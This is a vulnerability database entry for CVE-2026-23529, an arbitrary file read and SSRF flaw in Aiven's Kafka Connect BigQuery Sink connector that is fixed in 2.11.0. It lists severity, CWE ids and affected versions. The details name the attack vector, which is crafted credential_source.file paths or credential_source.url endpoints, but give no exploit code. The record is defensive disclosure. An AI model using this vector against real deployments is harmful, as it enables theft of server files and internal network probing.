CVE-2026-23529

See a problem?
Please try reporting it to the source first.

Source

https://cve.org/CVERecord?id=CVE-2026-23529

Import Source

https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-23529.json

JSON Data

https://api.test.osv.dev/v1/vulns/CVE-2026-23529

Aliases

GHSA-3mg8-2g53-5gj4

Published

2026-01-16T16:53:17.830Z

Modified

2026-01-18T03:44:39.386293Z

Severity

7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVSS Calculator

Summary

Arbitrary File Read in Google BigQuery Sink connector

Details

Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configurations for authentication to BigQuery services. During connector configuration, users can supply credential JSON files that are processed by Google authentication libraries. The service fails to validate externally-sourced credential configurations before passing them to the authentication libraries. An attacker can exploit this by providing a malicious credential configuration containing crafted credentialsource.file paths or credentialsource.url endpoints, resulting in arbitrary file reads or SSRF attacks.

Database specific

{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/23xxx/CVE-2026-23529.json",
    "cna_assigner": "GitHub_M",
    "cwe_ids": [
        "CWE-73",
        "CWE-918"
    ]
}

References

Affected packages

Git / github.com/aiven-open/bigquery-connector-for-apache-kafka

Affected ranges

Type: GIT
Repo: https://github.com/aiven-open/bigquery-connector-for-apache-kafka
Events: Introduced

0 Unknown introduced commit / All previous commits are affected

Fixed

879a14d6d0afa03042a272010192cbaf5ec506d6

Affected versions

1.*

1.1.0

1.1.1

1.1.2

1.2.0

1.3.0

1.4.1

1.5.1

1.5.2

1.6.0

1.6.1

1.6.2

1.6.3

1.6.4

1.6.5

Other

rcca-1766-1

v0.*

v0.17.0

v1.*

v1.1.3

v1.2.1

v1.3.1

v1.4.2

v1.5.3

v1.6.10

v1.6.6

v1.6.7

v1.6.8

v1.6.9

v2.*

v2.0.0

v2.0.1

v2.0.10

v2.0.11

v2.0.12

v2.0.13

v2.0.14

v2.0.15

v2.0.2

v2.0.3

v2.0.4

v2.0.5

v2.0.6

v2.0.7

v2.0.8

v2.0.9

v2.1.0

v2.1.1

v2.1.10

v2.1.11

v2.1.12

v2.1.13

v2.1.14

v2.1.15

v2.1.16

v2.1.17

v2.1.2

v2.1.3

v2.1.4

v2.1.5

v2.1.6

v2.1.7

v2.1.8

v2.1.9

v2.10.0

v2.10.1

v2.10.2

v2.10.3

v2.2.0

v2.2.1

v2.2.2

v2.2.3

v2.2.4

v2.2.5

v2.2.6

v2.2.7

v2.3.0

v2.3.1

v2.3.10

v2.3.11

v2.3.2

v2.3.3

v2.3.4

v2.3.5

v2.3.6

v2.3.7

v2.3.8

v2.3.9

v2.4.0

v2.4.1

v2.4.2

v2.4.3

v2.4.4

v2.4.5

v2.4.6

v2.5.0

v2.5.1

v2.5.2

v2.6.0

v2.7.0

v2.8.0

v2.9.0

Database specific

source

"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-23529.json"